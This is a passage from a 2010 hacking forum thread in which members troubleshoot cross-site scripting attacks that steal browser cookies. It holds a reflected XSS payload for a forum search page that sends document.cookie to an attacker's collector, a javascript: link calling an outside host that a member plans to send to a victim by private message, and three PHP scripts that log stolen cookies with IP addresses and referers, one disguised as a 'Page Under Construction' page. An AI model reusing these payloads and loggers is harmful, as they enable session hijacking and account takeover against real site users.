The script that you are trying is wrong. Try this:
http:// w w w .victimsite.com/forums/search.php?query="><script>document.location="http ://yoursite.com/cookiestealer?c=" + document.cookie</script>
|
Security Expert
|
|
| 15Jan2010,10:38 | #21 |
|
|
Contributor
|
|
| 15Jan2010,22:46 | #22 |
|
Thank you for your timely responses.
After using that code I am now getting the information and the cookie logged properly. however the page still does not redirect. I am using firefox 3.5.7 I don't know if that makes any difference. |
|
Security Expert
|
|
| 15Jan2010,22:47 | #23 |
|
|
pm me with the info..
|
|
Contributor
|
|
| 17Jan2010,05:40 | #24 |
|
|
turns out the issue is the host, the code works fine.
|
|
Go4Expert Member
|
|
| 16Feb2010,12:34 | #25 |
|
|
if i want test this script on myself what should i do? (logging in a forum or test that in firefox or ie?)
|
|
Newbie Member
|
|
| 10Apr2010,18:47 | #26 |
|
|
Quote:
Originally Posted by indiansword |
|
Security Expert
|
|
| 10Apr2010,20:31 | #27 |
|
|
Quote:
Originally Posted by ginoside021 |
|
Newbie Member
|
|
| 11Apr2010,19:10 | #28 |
|
|
Quote:
Originally Posted by indiansword i add you in my yahoo inocentjacky is my yahoo ID plssss |
|
Newbie Member
|
|
| 26Jun2010,22:10 | #29 |
|
|
i dont understand something...
for example if i put this cod as a index page <a href="javascript:void(document.location='h t t p://tefutingat.net23.net/steal/steal.php?cookie='+ document.cookie)">Click Me</a> and then send a pm to the victim to acces the link tefutingat.net23.net/steal the script will work? note that the script will open the index page and when the victim click click me the script will do his job i guess i do something wrong because none of them works. below are the stealer script that i use: 1 HTML Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>
HTML Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
echo '<b>Page Under Construction</b>'
?>
HTML Code:
<?php $cookie = $_GET['c']; $ip = getenv (‘REMOTE_ADDR’); $date=date(“j F, Y, g:i a”);; $referer=getenv (‘HTTP_REFERER’); $fp = fopen(‘cookies.html’, ‘a’); fwrite($fp, ‘Cookie: ‘.$cookie.’<br> IP: ‘ .$ip. ‘<br> Date and Time: ‘ .$date. ‘<br> Referer: ‘.$referer.’<br><br><br>’); fclose($fp); header (“Location:TechMafias”); ?> |
|
Contributor
|
|
| 26Jun2010,22:34 | #30 |
|
|
Quote:
Originally Posted by shadowman32 |